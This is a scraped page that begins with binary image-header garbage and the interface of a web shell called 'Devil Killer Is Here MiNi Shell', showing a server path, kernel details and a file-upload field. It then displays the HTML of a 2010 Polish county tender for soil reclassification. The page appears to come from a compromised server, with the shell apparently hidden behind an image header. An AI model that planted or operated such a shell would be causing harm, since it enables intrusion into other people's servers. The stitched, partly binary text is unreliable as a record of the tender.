JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100527/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100527/146070-N-2010.html

<p class="kh_header"><b>Przysucha: Zadanie Nr 1 - Wykonanie ponownej gleboznawczej klasyfikacji gruntów zmeliorowanych oraz na zmienionych użytkach gruntowych w obrębie Gałki gm. Rusinów - 808 ha

Zadanie Nr 2 - Wykonanie ponownej gleboznawczej klasyfikacji gruntów zmeliorowanych oraz na zmienionych użytkach gruntowych w obrębie Wola Gałecka gm. Rusinów - 687 ha.

Zadanie Nr 3 - Wykonanie ponownej gleboznawczej klasyfikacji gruntów zmeliorowanych oraz na zmienionych użytkach gruntowych w obrębie Zychorzyn gm. Rusinów - 941 ha.</b><br>
<b>Numer ogłoszenia: 146070 - 2010; data zamieszczenia: 27.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Przysuski , Aleja Jana Pawła II 10, 26-400 Przysucha, woj. mazowieckie, tel. 048 6752553, faks 048 6753672.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.przysucha.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zadanie Nr 1 - Wykonanie ponownej gleboznawczej klasyfikacji gruntów zmeliorowanych oraz na zmienionych użytkach gruntowych w obrębie Gałki gm. Rusinów - 808 ha

Zadanie Nr 2 - Wykonanie ponownej gleboznawczej klasyfikacji gruntów zmeliorowanych oraz na zmienionych użytkach gruntowych w obrębie Wola Gałecka gm. Rusinów - 687 ha.

Zadanie Nr 3 - Wykonanie ponownej gleboznawczej klasyfikacji gruntów zmeliorowanych oraz na zmienionych użytkach gruntowych w obrębie Zychorzyn gm. Rusinów - 941 ha..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie Nr 1 - Wykonanie ponownej gleboznawczej klasyfikacji gruntów zmeliorowanych oraz na zmienionych użytkach gruntowych w obrębie Gałki gm. Rusinów - 808 ha

Zadanie Nr 2 - Wykonanie ponownej gleboznawczej klasyfikacji gruntów zmeliorowanych oraz na zmienionych użytkach gruntowych w obrębie Wola Gałecka gm. Rusinów - 687 ha

Zadanie Nr 3 - Wykonanie ponownej gleboznawczej klasyfikacji gruntów zmeliorowanych oraz na zmienionych użytkach gruntowych w obrębie Zychorzyn gm. Rusinów - 941 ha

Kod CPV 
74274300-3 Usługi katastralne

Przedmiotem zamówienia objęto m.in.:
- Analizę i ocenę wyjściowych materiałów geodezyjno - kartograficznych ewidencji 
   gruntów w tym także z zakresu gleboznawczej klasyfikacji gruntów i melioracji.
- Wywiad terenowy oraz wykonanie pomiaru zmienionych użytków i klas gruntów.
- Przeprowadzenie badań gleboznawczych oraz sporządzenie protokółu 
   klasyfikacyjnego.
- Opracowanie mapy klasyfikacji gruntów.
- Poinformowanie zainteresowanych osób o wynikach gleboznawczej klasyfikacji 
   gruntów.
- Opracowanie i przekazanie do Starosty dokumentów niezbędnych do wydania 
   decyzji o zatwierdzeniu klasyfikacji.
- Obliczenie powierzchni użytków i klas gleboznawczych z wyrównaniem ich do 
   powierzchni działek ewidencyjnych.
- Sporządzenie wykazu zmian gruntowych oraz pliku wsadowego do EGB.
- Mapę klasyfikacyjną oraz zaktualizowaną mapę ewidencyjną należy wykonać w 
   systemie EWMAPA z wykorzystaniem istniejącej bazy działek doprowadzając do 
   zgodności część kartograficzną z częścią opisową. Dokonać transformacji 
   korekcyjnej bazy działek w oparciu o zidentyfikowane i pomierzone w terenie 
   punkty graficzne działek.
- Skompletowanie całości dokumentów i przekazanie do Powiatowego Ośrodka 
   Dokumentacji Geodezyjnej i Kartograficznej.

Szczegółowy zakres opracowania poszczególnych zadań opisany został za pomocą Warunków technicznych stanowiących - załącznik nr 3 do SIWZ.

W/w usługi powinny być zrealizowanymi zgodnie z obowiązującymi normami i przepisami prawnymi.

Zamawiający dopuszcza możliwość składania ofert częściowych. 

Opłata za ośrodek naliczona będzie zgodnie z tabelą nr III pkt 3, załącznika nr 1 do Rozporządzenia Ministra Infrastruktury z dnia 19 lutego 2004 r. w sprawie wysokości opłat za czynności geodezyjne i kartograficzne oraz udzielenie informacji a także za wykonywanie wyrysów i wypisów z operatu ewidencyjnego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 74.27.43.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Zamawiający uzna, że warunek jest spełniony, jeżeli Wykonawca złoży  wraz z ofertą podpisany załącznik Nr 1 do formularza oferty - oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa  w art. 22 ust. 1 ustawy pzp; załącznik nr 1 do formularza oferty;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Zamawiający uzna, że warunek jest spełniony, jeżeli Wykonawca złoży  wraz z ofertą podpisany załącznik Nr 1 do formularza oferty - oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa  w art. 22 ust. 1 ustawy pzp; załącznik nr 1 do formularza oferty;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Zamawiający uzna, że warunek jest spełniony, jeżeli Wykonawca złoży  wraz z ofertą podpisany załącznik Nr 1 do formularza oferty - oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa  w art. 22 ust. 1 ustawy pzp; załącznik nr 1 do formularza oferty;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Zamawiający uzna, że warunek jest spełniony, jeżeli Wykonawca złoży  wraz z ofertą podpisany załącznik Nr 1 do formularza oferty - oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa  w art. 22 ust. 1 ustawy pzp; załącznik nr 1 do formularza oferty;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Zamawiający uzna, że warunek jest spełniony, jeżeli Wykonawca złoży  wraz z ofertą podpisany załącznik Nr 1 do formularza oferty - oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa  w art. 22 ust. 1 ustawy pzp; załącznik nr 1 do formularza oferty;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Poza dokumentami potwierdzającymi spełniania warunków udziału w postępowaniu oferta powinna również zawierać:
a) Wypełniony formularz oferty (załącznik nr1 do SIWZ),
b) W przypadku, gdy wykonawcę w przetargu reprezentuje pełnomocnik oryginał 
    pełnomocnictwa do działania w imieniu wykonawcy lub notarialnie potwierdzony 
    odpis takiego pełnomocnictwa 
c) wykonawcy wspólnie ubiegający się o zamówienie zobowiązani są załączyć 
    oryginał pełnomocnictwa do reprezentowania ich w postępowaniu o udzielenie 
    zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie 
    zamówienia  publicznego.

    Dokument pełnomocnictwa powinien być dołączony do oferty i zawierać w szczególności wskazanie postępowania o zamówienie publiczne, którego dotyczy, Wykonawców ubiegających się wspólnie o udzielenie zamówienia, ustanowionego Pełnomocnika oraz zakres jego umocowania. Dokument pełnomocnictwa musi być podpisany w imieniu wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia, w tym Wykonawcę ustanowionego jako Pełnomocnika przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji danego Wykonawcy. Stosowne odpisy z rejestru lub ewidencji powinny zostać dołączone do oferty.

W celu potwierdzenia, że oferowane usługi spełniają wymagania określone przez     zamawiającego wykonawca powinien złożyć oświadczenie zawarte w formularzu oferty stanowiącym załącznik nr 1 do specyfikacji istotnych warunków zamówienia.

Zamawiający żąda, aby w formularzu oferty Wykonawca wskazał części zamówienia, których wykonanie powierzy podwykonawcom</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza możliwość dokonania w umowie następujących zmian: 
a) danych teleadresowych w przypadku ich wystąpienia
b) wynagrodzenia w przypadku ustawowej zmiany podatku VAT,
c) dotycząca zatrudnienia podwykonawców w przypadku gdy Wykonawca 
    oświadczył, iż wykona umowę osobiście,
d) zmiany osobowej podwykonawców oraz zakresu podwykonawstwa w przypadku 
    gdy Wykonawca wykonuje umowę przy pomocy podwykonawców.
e) terminu wykonania umowy w przypadku:
    - zaistnienia działań wojennych, aktów terroryzmu, rewolucji, przewrotu 
      wojskowego lub cywilnego, wojny domowej, skażeń radioaktywnych, z 
      wyjątkiem tych które mogą być  spowodowane użyciem ich przez  wykonawcę,
   - zaistnienia klęski żywiołowej, jak huragany, powodzie, trzęsienie ziemi, bunty, 
      niepokoje, strajki, okupacje budowy przez osoby inne niż pracownicy 
      wykonawcy i jego  podwykonawców,
   - wstrzymania robót przez Zamawiającego albo przerw w wykonywaniu robót 
     powstałych   na skutek okoliczności, za które ponosi odpowiedzialność 
     Zamawiający,
przy zastrzeżeniu, że powyższe okoliczności wymagają udokumentowania w dzienniku budowy pod rygorem utraty prawa powoływania się na nie przez Wykonawcę.

Warunki dokonania zamian:
a) zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu 
    stron, wyrażoną na piśmie, pod rygorem nieważności,
b) Strona występująca o zmianę postanowień zawartej umowy: 
    - opisze zaistniałe okoliczności, 
    - uzasadni, udokumentuje zaistnienie powyższych okoliczności,
c)   wniosek o zmianę postanowień zawartej umowy musi być sporządzony na 
      piśmie</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.przysucha.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 26-400 Przysucha, Aleja Jana pawła II 10, pokój nr 27, cena formularza 12,57 zł brutto.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.06.2010 godzina 09:30, miejsce: 26-400 Przysucha, Aleja Jana Pawła II 10, pokój nr 32 (sekretariat - I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr 1 - Wykonanie ponownej gleboznawczej klasyfikacji gruntów zmeliorowanych oraz na zmienionych użytkach gruntowych w obrębie Gałki gm. Rusinów - 808 ha.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 1 - Wykonanie ponownej gleboznawczej klasyfikacji gruntów zmeliorowanych oraz na zmienionych użytkach gruntowych w obrębie Gałki gm. Rusinów - 808 ha.
Przedmiotem zamówienia objęto m.in.:
- Analizę i ocenę wyjściowych materiałów geodezyjno - kartograficznych ewidencji gruntów w tym także z zakresu gleboznawczej klasyfikacji gruntów i melioracji.
- Wywiad terenowy oraz wykonanie pomiaru zmienionych użytków i klas gruntów.
- Przeprowadzenie badań gleboznawczych oraz sporządzenie protokółu klasyfikacyjnego.
- Opracowanie mapy klasyfikacji gruntów.
- Poinformowanie zainteresowanych osób o wynikach gleboznawczej klasyfikacji gruntów.
- Opracowanie i przekazanie do Starosty dokumentów niezbędnych do wydania decyzji o zatwierdzeniu klasyfikacji.
- Obliczenie powierzchni użytków i klas gleboznawczych z wyrównaniem ich do powierzchni działek ewidencyjnych.
- Sporządzenie wykazu zmian gruntowych oraz pliku wsadowego do EGB.
- Mapę klasyfikacyjną oraz zaktualizowaną mapę ewidencyjną należy wykonać w systemie EWMAPA z wykorzystaniem istniejącej bazy działek doprowadzając do zgodności część kartograficzną z częścią opisową. Dokonać transformacji korekcyjnej bazy działek w oparciu o zidentyfikowane i pomierzone w terenie punkty graficzne działek.
- Skompletowanie całości dokumentów i przekazanie do Powiatowego Ośrodka Dokumentacji Geodezyjnej i Kartograficznej.

Szczegółowy zakres opracowania poszczególnych zadań opisany został za pomocą Warunków technicznych stanowiących - załącznik nr 3 do SIWZ.

W/w usługi powinny być zrealizowanymi zgodnie z obowiązującymi normami i przepisami prawnymi

Zamawiający dopuszcza możliwość składania ofert częściowych. 

Opłata za ośrodek naliczona będzie zgodnie z tabelą nr III pkt 3, załącznika nr 1 do Rozporządzenia Ministra Infrastruktury z dnia 19 lutego 2004 r. w sprawie wysokości opłat za czynności geodezyjne i kartograficzne oraz udzielenie informacji a także za wykonywanie wyrysów i wypisów z operatu ewidencyjnego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 74.27.43.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2 - Wykonanie ponownej gleboznawczej klasyfikacji gruntów zmeliorowanych oraz na zmienionych użytkach gruntowych w obrębie Wola Gałecka gm. Rusinów - 687 ha.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 2 - Wykonanie ponownej gleboznawczej klasyfikacji gruntów zmeliorowanych oraz na zmienionych użytkach gruntowych w obrębie Wola Gałecka gm. Rusinów - 687 ha.

Przedmiotem zamówienia objęto m.in.:
- Analizę i ocenę wyjściowych materiałów geodezyjno - kartograficznych ewidencji gruntów w tym także z zakresu gleboznawczej klasyfikacji gruntów i melioracji.
- Wywiad terenowy oraz wykonanie pomiaru zmienionych użytków i klas gruntów.
- Przeprowadzenie badań gleboznawczych oraz sporządzenie protokółu klasyfikacyjnego.
- Opracowanie mapy klasyfikacji gruntów.
- Poinformowanie zainteresowanych osób o wynikach gleboznawczej klasyfikacji gruntów.
- Opracowanie i przekazanie do Starosty dokumentów niezbędnych do wydania decyzji o zatwierdzeniu klasyfikacji.
- Obliczenie powierzchni użytków i klas gleboznawczych z wyrównaniem ich do powierzchni działek ewidencyjnych.
- Sporządzenie wykazu zmian gruntowych oraz pliku wsadowego do EGB.
- Mapę klasyfikacyjną oraz zaktualizowaną mapę ewidencyjną należy wykonać w systemie EWMAPA z wykorzystaniem istniejącej bazy działek doprowadzając do zgodności część kartograficzną z częścią opisową. Dokonać transformacji korekcyjnej bazy działek w oparciu o zidentyfikowane i pomierzone w terenie punkty graficzne działek.
- Skompletowanie całości dokumentów i przekazanie do Powiatowego Ośrodka Dokumentacji Geodezyjnej i Kartograficznej.

Szczegółowy zakres opracowania poszczególnych zadań opisany został za pomocą Warunków technicznych stanowiących - załącznik nr 3 do SIWZ.

W/w usługi powinny być zrealizowanymi zgodnie z obowiązującymi normami i przepisami prawnymi

Zamawiający dopuszcza możliwość składania ofert częściowych. 

Opłata za ośrodek naliczona będzie zgodnie z tabelą nr III pkt 3, załącznika nr 1 do Rozporządzenia Ministra Infrastruktury z dnia 19 lutego 2004 r. w sprawie wysokości opłat za czynności geodezyjne i kartograficzne oraz udzielenie informacji a także za wykonywanie wyrysów i wypisów z operatu ewidencyjnego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 74.27.43.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie Nr 3 - Wykonanie ponownej gleboznawczej klasyfikacji gruntów zmeliorowanych oraz na zmienionych użytkach gruntowych w obrębie Zychorzyn gm. Rusinów - 941 ha.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 3 - Wykonanie ponownej gleboznawczej klasyfikacji gruntów zmeliorowanych oraz na zmienionych użytkach gruntowych w obrębie Zychorzyn gm. Rusinów - 941 ha.

Przedmiotem zamówienia objęto m.in.:
- Analizę i ocenę wyjściowych materiałów geodezyjno - kartograficznych ewidencji gruntów w tym także z zakresu gleboznawczej klasyfikacji gruntów i melioracji.
- Wywiad terenowy oraz wykonanie pomiaru zmienionych użytków i klas gruntów.
- Przeprowadzenie badań gleboznawczych oraz sporządzenie protokółu klasyfikacyjnego.
- Opracowanie mapy klasyfikacji gruntów.
- Poinformowanie zainteresowanych osób o wynikach gleboznawczej klasyfikacji gruntów.
- Opracowanie i przekazanie do Starosty dokumentów niezbędnych do wydania decyzji o zatwierdzeniu klasyfikacji.
- Obliczenie powierzchni użytków i klas gleboznawczych z wyrównaniem ich do powierzchni działek ewidencyjnych.
- Sporządzenie wykazu zmian gruntowych oraz pliku wsadowego do EGB.
- Mapę klasyfikacyjną oraz zaktualizowaną mapę ewidencyjną należy wykonać w systemie EWMAPA z wykorzystaniem istniejącej bazy działek doprowadzając do zgodności część kartograficzną z częścią opisową. Dokonać transformacji korekcyjnej bazy działek w oparciu o zidentyfikowane i pomierzone w terenie punkty graficzne działek.
- Skompletowanie całości dokumentów i przekazanie do Powiatowego Ośrodka Dokumentacji Geodezyjnej i Kartograficznej.

Szczegółowy zakres opracowania poszczególnych zadań opisany został za pomocą Warunków technicznych stanowiących - załącznik nr 3 do SIWZ.

W/w usługi powinny być zrealizowanymi zgodnie z obowiązującymi normami i przepisami prawnymi

Zamawiający dopuszcza możliwość składania ofert częściowych. 

